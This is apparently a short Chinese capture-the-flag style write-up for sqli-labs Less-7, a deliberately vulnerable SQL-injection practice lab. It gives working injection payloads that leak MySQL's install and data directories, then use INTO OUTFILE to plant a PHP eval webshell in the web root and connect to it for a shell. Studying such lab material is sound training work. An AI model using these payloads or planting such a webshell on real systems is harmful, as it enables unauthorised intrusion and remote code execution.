Sqli-labs 07
- 如果能够猜对 id 是由一对单引号外加两重圆括号括起来的情况下,也可以用前面的方法注入
- 但是题目提示我们通过输出外部文件的方法来做,也需要试出 id 是由一对单引号外加两重圆括号括起来的
泄露SQL安装目录和SQL数据目录
?id=-1 union select 1,@@basedir,@@datadir --+
推测出网页文件所在的目录
- 由此可知后台使用的是xampp集成,推测出Less 7所在的目录为C:\xampp\htdocs\sqli-labs\Less-7\fuck.php
- 这里不能使用相对路径的原因在于MySQL的工作目录并不是网页文件所在的目录
上传WebShell到网页文件所在的目录
- 找到目录后直接上传后门,并且用蚁剑连上去
?id=1')) union select 1,2,'<?php @eval($_POST["fuck"])?>' into outfile 'C:\\xampp\\htdocs\\sqli-labs\\Less-7\\fuck.php' --+
成功Get Shell